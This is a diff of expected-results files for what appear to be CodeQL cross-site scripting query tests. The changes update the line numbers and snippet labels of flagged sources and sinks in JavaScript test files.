') | semmle.label | invalid ... n(', ') | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... 
rams.id | | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | semmle.label | req.params.id | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | semmle.label | "FOO: " ... rams.id | 
@@ -335,28 +335,28 @@ nodes subpaths | ReflectedXssGood3.js:139:24:139:26 | url | ReflectedXssGood3.js:68:22:68:26 | value | ReflectedXssGood3.js:108:10:108:23 | parts.join('') | ReflectedXssGood3.js:139:12:139:27 | escapeHtml3(url) | #select -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | ReflectedXss.js:8:33:8:45 | req.params.id | ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | ReflectedXss.js:17:31:17:39 | params.id | ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | ReflectedXss.js:23:19:23:26 | req.body | ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | ReflectedXss.js:42:31:42:38 | req.body | ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | ReflectedXss.js:64:14:64:21 | req.body | ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | ReflectedXss.js:68:33:68:40 | req.body | ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | ReflectedXss.js:72:48:72:55 | req.body | ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | ReflectedXss.js:74:20:74:27 | req.body | ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | ReflectedXss.js:84:22:84:29 | req.body | ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | ReflectedXss.js:85:23:85:30 | req.body | ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | ReflectedXss.js:98:30:98:37 | req.body | ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | ReflectedXss.js:100:31:100:38 | req.body | ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | ReflectedXss.js:103:76:103:83 | req.body | ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:114:13:114:27 | keys: queryKeys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... 
rams.id | ReflectedXss.js:7:33:7:45 | req.params.id | ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | ReflectedXss.js:16:31:16:39 | params.id | ReflectedXss.js:16:12:16:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | ReflectedXss.js:22:19:22:26 | req.body | ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | ReflectedXss.js:41:31:41:38 | req.body | ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | ReflectedXss.js:63:14:63:21 | req.body | ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | ReflectedXss.js:67:33:67:40 | req.body | ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | ReflectedXss.js:71:48:71:55 | req.body | ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | ReflectedXss.js:73:20:73:27 | req.body | ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | ReflectedXss.js:83:22:83:29 | req.body | ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | ReflectedXss.js:84:23:84:30 | req.body | ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to a $@. 
| ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | ReflectedXss.js:97:30:97:37 | req.body | ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | ReflectedXss.js:99:31:99:38 | req.body | ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | ReflectedXss.js:102:76:102:83 | req.body | ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:113:13:113:27 | keys: queryKeys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to a $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. 
| ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to a $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected index d29b35203b80..eae50c0243f9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ReflectedXssWithCustomSanitizer.expected 
@@ -1,25 +1,25 @@ -| ReflectedXss.js:8:14:8:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:8:33:8:45 | req.params.id | user-provided value | -| ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:17:31:17:39 | params.id | user-provided value | -| ReflectedXss.js:22:12:22:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:12:22:19 | req.body | user-provided value | -| ReflectedXss.js:23:12:23:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:23:19:23:26 | req.body | user-provided value | -| ReflectedXss.js:29:12:29:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:29:12:29:19 | req.body | user-provided value | -| ReflectedXss.js:41:12:41:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:12:41:19 | req.body | user-provided value | -| ReflectedXss.js:42:12:42:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:42:31:42:38 | req.body | user-provided value | -| ReflectedXss.js:56:12:56:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:56:12:56:19 | req.body | user-provided value | -| ReflectedXss.js:65:16:65:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:64:14:64:21 | req.body | user-provided value | -| ReflectedXss.js:68:12:68:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:68:33:68:40 | req.body | user-provided value | -| ReflectedXss.js:72:12:72:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:72:48:72:55 | req.body | user-provided value | -| ReflectedXss.js:75:14:75:14 | f | Cross-site scripting vulnerability due to $@. 
| ReflectedXss.js:74:20:74:27 | req.body | user-provided value | -| ReflectedXss.js:83:12:83:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:83:12:83:19 | req.body | user-provided value | -| ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:22:84:29 | req.body | user-provided value | -| ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:85:23:85:30 | req.body | user-provided value | -| ReflectedXss.js:97:12:97:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:12:97:19 | req.body | user-provided value | -| ReflectedXss.js:98:12:98:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:98:30:98:37 | req.body | user-provided value | -| ReflectedXss.js:100:12:100:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:100:31:100:38 | req.body | user-provided value | -| ReflectedXss.js:103:12:103:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:103:76:103:83 | req.body | user-provided value | -| ReflectedXss.js:110:16:110:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:110:16:110:30 | request.query.p | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:114:13:114:27 | keys: queryKeys | user-provided value | -| ReflectedXss.js:122:30:122:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:116:31:116:45 | paramKeys?.keys | user-provided value | +| ReflectedXss.js:7:14:7:45 | "Unknow ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:7:33:7:45 | req.params.id | user-provided value | +| ReflectedXss.js:16:12:16:39 | "Unknow ... 
rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:16:31:16:39 | params.id | user-provided value | +| ReflectedXss.js:21:12:21:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:21:12:21:19 | req.body | user-provided value | +| ReflectedXss.js:22:12:22:27 | marked(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:22:19:22:26 | req.body | user-provided value | +| ReflectedXss.js:28:12:28:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:28:12:28:19 | req.body | user-provided value | +| ReflectedXss.js:40:12:40:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:40:12:40:19 | req.body | user-provided value | +| ReflectedXss.js:41:12:41:39 | convert ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:41:31:41:38 | req.body | user-provided value | +| ReflectedXss.js:55:12:55:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:55:12:55:19 | req.body | user-provided value | +| ReflectedXss.js:64:16:64:19 | file | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:63:14:63:21 | req.body | user-provided value | +| ReflectedXss.js:67:12:67:52 | remark( ... tring() | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:67:33:67:40 | req.body | user-provided value | +| ReflectedXss.js:71:12:71:65 | unified ... oString | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:71:48:71:55 | req.body | user-provided value | +| ReflectedXss.js:74:14:74:14 | f | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:73:20:73:27 | req.body | user-provided value | +| ReflectedXss.js:82:12:82:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:82:12:82:19 | req.body | user-provided value | +| ReflectedXss.js:83:12:83:30 | snarkdown(req.body) | Cross-site scripting vulnerability due to $@. 
| ReflectedXss.js:83:22:83:29 | req.body | user-provided value | +| ReflectedXss.js:84:12:84:31 | snarkdown2(req.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:84:23:84:30 | req.body | user-provided value | +| ReflectedXss.js:96:12:96:19 | req.body | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:96:12:96:19 | req.body | user-provided value | +| ReflectedXss.js:97:12:97:38 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:97:30:97:37 | req.body | user-provided value | +| ReflectedXss.js:99:12:99:39 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:99:31:99:38 | req.body | user-provided value | +| ReflectedXss.js:102:12:102:84 | markdow ... q.body) | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:102:76:102:83 | req.body | user-provided value | +| ReflectedXss.js:109:16:109:30 | request.query.p | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:109:16:109:30 | request.query.p | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:113:13:113:27 | keys: queryKeys | user-provided value | +| ReflectedXss.js:121:30:121:73 | `${inva ... telist` | Cross-site scripting vulnerability due to $@. | ReflectedXss.js:115:31:115:45 | paramKeys?.keys | user-provided value | | ReflectedXssContentTypes.js:10:14:10:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:10:24:10:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:20:14:20:36 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:20:24:20:36 | req.params.id | user-provided value | | ReflectedXssContentTypes.js:39:13:39:35 | "FOO: " ... rams.id | Cross-site scripting vulnerability due to $@. | ReflectedXssContentTypes.js:39:23:39:35 | req.params.id | user-provided value | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected index f246b00d7878..b17ab0564834 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/UnsafeJQueryPlugin.expected 
@@ -169,17 +169,17 @@ subpaths | unsafe-jquery-plugin.js:48:6:48:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:48:6:48:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:52:6:52:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:52:6:52:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:60:6:60:11 | target | unsafe-jquery-plugin.js:2:38:2:44 | options | unsafe-jquery-plugin.js:60:6:60:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:2:19:63:2 | functio ... \\t\\t}\\n\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:65:19:69:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... / OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | unsafe-jquery-plugin.js:65:47:65:53 | options | unsafe-jquery-plugin.js:68:45:68:63 | this.options.parent | Potential XSS vulnerability in the $@. 
| unsafe-jquery-plugin.js:65:19:69:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | unsafe-jquery-plugin.js:71:38:71:44 | options | unsafe-jquery-plugin.js:72:5:72:23 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:71:19:74:2 | functio ... ml);\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | unsafe-jquery-plugin.js:76:38:76:44 | options | unsafe-jquery-plugin.js:77:17:77:35 | options.foo.bar.baz | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:76:19:78:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:90:6:90:6 | t | unsafe-jquery-plugin.js:84:38:84:44 | options | unsafe-jquery-plugin.js:90:6:90:6 | t | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:84:19:93:2 | functio ... ns);\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... 
T OK\\n\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... OK\\n\\t\\t} | '$.fn.my_plugin' plugin | -| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... T OK\\n\\t} | '$.fn.affix' plugin | -| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... T OK\\n\\t} | '$.fn.tooltip' plugin | -| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... NCY]\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:107:5:107:18 | options.target | unsafe-jquery-plugin.js:101:38:101:44 | options | unsafe-jquery-plugin.js:107:5:107:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:101:19:108:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:117:5:117:18 | options.target | unsafe-jquery-plugin.js:114:38:114:44 | options | unsafe-jquery-plugin.js:117:5:117:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:114:19:118:2 | functio ... 
lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:122:5:122:18 | options.target | unsafe-jquery-plugin.js:121:40:121:46 | options | unsafe-jquery-plugin.js:122:5:122:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:121:21:123:2 | functio ... lert\\n\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:127:6:127:19 | options.target | unsafe-jquery-plugin.js:126:33:126:39 | options | unsafe-jquery-plugin.js:127:6:127:19 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:126:14:128:3 | functio ... ert\\n\\t\\t} | '$.fn.my_plugin' plugin | +| unsafe-jquery-plugin.js:132:5:132:18 | options.target | unsafe-jquery-plugin.js:131:34:131:40 | options | unsafe-jquery-plugin.js:132:5:132:18 | options.target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:131:15:133:2 | functio ... lert\\n\\t} | '$.fn.affix' plugin | +| unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | unsafe-jquery-plugin.js:135:36:135:42 | options | unsafe-jquery-plugin.js:136:5:136:29 | options ... elector | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:135:17:137:2 | functio ... lert\\n\\t} | '$.fn.tooltip' plugin | +| unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | unsafe-jquery-plugin.js:153:38:153:44 | options | unsafe-jquery-plugin.js:157:44:157:59 | options.target.a | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:153:19:158:2 | functio ... ties\\n\\t} | '$.fn.my_plugin' plugin | | unsafe-jquery-plugin.js:170:6:170:11 | target | unsafe-jquery-plugin.js:160:38:160:44 | options | unsafe-jquery-plugin.js:170:6:170:11 | target | Potential XSS vulnerability in the $@. | unsafe-jquery-plugin.js:160:19:173:2 | functio ... 
